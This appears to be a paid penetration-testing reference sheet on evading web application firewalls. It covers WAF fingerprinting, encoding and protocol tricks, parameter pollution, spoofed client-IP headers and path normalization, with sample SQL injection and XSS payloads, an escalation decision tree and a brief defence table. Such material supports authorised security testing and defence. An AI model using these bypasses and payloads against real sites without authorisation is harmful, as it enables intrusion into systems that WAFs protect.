waf-bypass-techniques

$27

1. PHASE 0 — IDENTIFY THE WAF

Before bypassing, know what you're fighting.

1.1 Tools

Tool

Usage

wafw00f target.com

Fingerprint WAF vendor from response headers/behavior

nmap --script=http-waf-detect

NSE script for WAF detection

Manual header inspection

Server, X-CDN, X-Cache, cf-ray (Cloudflare), x-sucuri-id, x-akamai-*

1.2 Behavioral Fingerprinting

1. Send benign request → record baseline response (status, headers, body size)

2. Send obvious attack: /?q=<script>alert(1)</script>

3. Compare: 403? Custom block page? Redirect? Connection reset?

4. Block page content reveals WAF: "Cloudflare", "Access Denied (Imperva)", "ModSecurity"

5. If transparent proxy: check response time difference (WAF adds latency)

2. GENERIC BYPASS CATEGORIES

2.1 Encoding Bypasses

Technique

Example

Bypasses

URL encoding

%3Cscript%3E

Basic string matching

Double URL encoding

%253Cscript%253E

WAFs that decode once, app decodes twice

Unicode encoding

%u003Cscript%u003E

IIS-specific Unicode normalization

HTML entities

<script> or <script>

WAFs not performing HTML entity decoding

Hex encoding (SQL)

0x756E696F6E = union

WAFs matching SQL keywords

Octal encoding

\74script\76

Rare but some parsers handle it

Overlong UTF-8

%C0%BC (invalid encoding for <)

Legacy parsers with loose UTF-8 handling

Mixed case

SeLeCt, uNiOn

Case-sensitive rule matching

Null byte

sel%00ect

WAFs that stop parsing at null

2.2 Chunked Transfer Encoding

Split the payload across HTTP chunks so no single chunk contains the blocked pattern:

POST /search HTTP/1.1

Transfer-Encoding: chunked

3

sel

3

ect

1

4

from

0

WAFs that inspect the full body may not reassemble chunks before matching.

2.3 HTTP/2 Binary Format Bypasses

HTTP/2 transmits headers as binary HPACK-encoded frames. Some WAFs only inspect after downgrading to HTTP/1.1:

• Header names can contain characters illegal in HTTP/1.1

• Pseudo-headers (:method, :path) bypass header-based WAF rules

• H2 → H1 downgrade may introduce request smuggling (see request-smuggling)

2.4 HTTP Parameter Pollution (HPP)

Different servers handle duplicate parameters differently:

Server

Behavior for ?a=1&a=2

PHP/Apache

Last value: a=2

ASP.NET/IIS

Concatenated: a=1,2

Python/Flask

First value: a=1

Node.js/Express

Array: a=[1,2]

WAF checks a=1 (benign), app uses a=2 (malicious). Or combine: a=sel&a=ect → ASP.NET sees a=sel,ect.

2.5 IP Source Spoofing (Bypass IP-Based Rules)

Headers trusted by some WAFs/apps for client IP:

X-Forwarded-For: 127.0.0.1

X-Real-IP: 127.0.0.1

X-Originating-IP: 127.0.0.1

True-Client-IP: 127.0.0.1

CF-Connecting-IP: 127.0.0.1

X-Client-IP: 127.0.0.1

Forwarded: for=127.0.0.1

Use case: WAF whitelists internal IPs or has different rule sets per source.

2.6 Path Normalization Tricks

Technique

Example

Effect

Dot segments

/./admin or /../target/admin

WAF sees different path than app

Double slash

//admin

Some normalizers collapse, WAFs may not

URL encoding path

/%61dmin

WAF sees encoded, app decodes

Null byte in path

/admin%00.jpg

Legacy: app truncates at null, WAF sees .jpg

Backslash (IIS)

/admin\..\/secret

IIS treats \ as /

Trailing dot/space

/admin. or /admin%20

OS-level normalization (Windows)

Semicolon (Tomcat)

/admin;jsessionid=x

Tomcat strips after ;, WAF may not

2.7 Content-Type Manipulation

WAFs often have format-specific parsers. Switching Content-Type can bypass rules:

Default:  Content-Type: application/x-www-form-urlencoded  → WAF parses params

Switch:   Content-Type: application/json  → WAF may not parse JSON body

Switch:   Content-Type: multipart/form-data  → WAF may not inspect all parts

Switch:   Content-Type: text/xml  → WAF expects XML, payload in different format

Trick: If app accepts both JSON and form-urlencoded, use JSON — WAFs often have weaker JSON inspection rules.

2.8 Multipart Boundary Abuse

Content-Type: multipart/form-data; boundary=----WAFBypass

------WAFBypass

Content-Disposition: form-data; name="q"

<script>alert(1)</script>

------WAFBypass--

Variations: long boundary strings, boundary with special characters, missing final boundary, nested multipart.

2.9 Newline & Whitespace Injection

-- SQL keyword splitting

SEL

ECT * FROM users

-- SQL comment insertion

SEL/**/ECT * FR/**/OM users

UN/**/ION SEL/**/ECT 1,2,3

-- Tab/vertical tab as separator

SELECT\t*\tFROM\tusers

2.10 Keyword Splitting & Alternative Syntax

Blocked

Alternative

UNION SELECT

UNION ALL SELECT, UNION DISTINCT SELECT

OR 1=1

OR 2>1, OR 'a'='a',

<script>

<svg/onload=alert(1)>, <img src=x onerror=alert(1)>

alert(1)

prompt(1), confirm(1), print() (Chrome)

eval()

Function('code')(), setTimeout('code',0)

' OR '1'='1

' OR 1-- -, '||'1

SLEEP(5)

BENCHMARK(5000000,SHA1('x')), pg_sleep(5)

3. PROTOCOL-LEVEL BYPASS TECHNIQUES

3.1 Request Line Abuse

GET /path?q=attack HTTP/1.1    ← WAF inspects

vs.

GET http://target.com/path?q=attack HTTP/1.1   ← Absolute URI: some WAFs miss the path

3.2 Header Injection via CRLF

If WAF inspects original headers but app processes injected ones:

X-Custom: value\r\nX-Forwarded-For: 127.0.0.1

3.3 Connection-State Bypass

1. Establish connection through WAF (normal request)

2. On same keep-alive connection, send attack request

3. Some WAFs reduce inspection on subsequent requests in same connection

4. WAF BYPASS DECISION TREE

Payload blocked by WAF?

├── Identify WAF (wafw00f, response headers, block page)

│

├── Try encoding bypasses

│   ├── URL encode payload → still blocked?

│   ├── Double URL encode → still blocked?

│   ├── Unicode/overlong UTF-8 → still blocked?

│   ├── Mixed case keywords → still blocked?

│   └── HTML entities (for XSS) → still blocked?

│

├── Try protocol-level bypasses

│   ├── Switch Content-Type (JSON, multipart, XML)

│   │   └── App accepts alternate format? → re-send payload

│   ├── HTTP Parameter Pollution (duplicate params)

│   ├── Chunked Transfer-Encoding to split payload

│   ├── HTTP/2 direct if available (binary framing bypass)

│   └── Request line: absolute URI format

│

├── Try path-based bypasses

│   ├── Path normalization (/./path, //path, ;param)

│   ├── Different HTTP method (POST vs PUT vs PATCH)

│   └── Alternate endpoint serving same function

│

├── Try payload mutation

│   ├── SQL: comments (/**/), alternative functions, hex literals

│   ├── XSS: alternative tags/events, JS template literals

│   ├── RCE: wildcard abuse, string concatenation, variable expansion

│   └── Check WAF_PRODUCT_MATRIX.md for vendor-specific mutations

│

├── Try IP-source bypass

│   ├── X-Forwarded-For / True-Client-IP spoofing

│   ├── Access origin server directly (bypass CDN)

│   └── Find origin IP (Shodan, historical DNS, email headers)

│

└── Try request smuggling to skip WAF entirely

    └── See ../request-smuggling/SKILL.md

5. COMMON MISTAKES & TRICK NOTES

• Test bypass with actual exploitation, not just 200 OK: WAF may return 200 but strip the payload silently.

• WAFs often have size limits: Very large request bodies (>8KB–128KB depending on WAF) may bypass inspection entirely.

• Rate limiting ≠ WAF: Getting 429s is rate limiting, not payload blocking. Different bypass needed.

• CDN caching: If the WAF is at CDN level, cached responses bypass WAF on subsequent requests. Poison cache with clean request, exploit cache.

• Origin server direct access: If you find the origin IP behind CDN/WAF, connect directly — WAF is bypassed completely.

• Multipart file upload fields: WAFs often skip inspection of file content in multipart uploads — embed payload in filename or file content if reflected.

6. DEFENSE PERSPECTIVE

Measure

Notes

WAF + application-level input validation

WAF is a layer, not a fix

Parameterized queries

Eliminates SQLi regardless of WAF

CSP + output encoding

Eliminates XSS regardless of WAF

Regularly update WAF rules

Vendor signatures lag behind new bypasses

Deny by default, not block-list

Allowlist valid input patterns

Log and alert on WAF blocks

Bypass attempts are visible in logs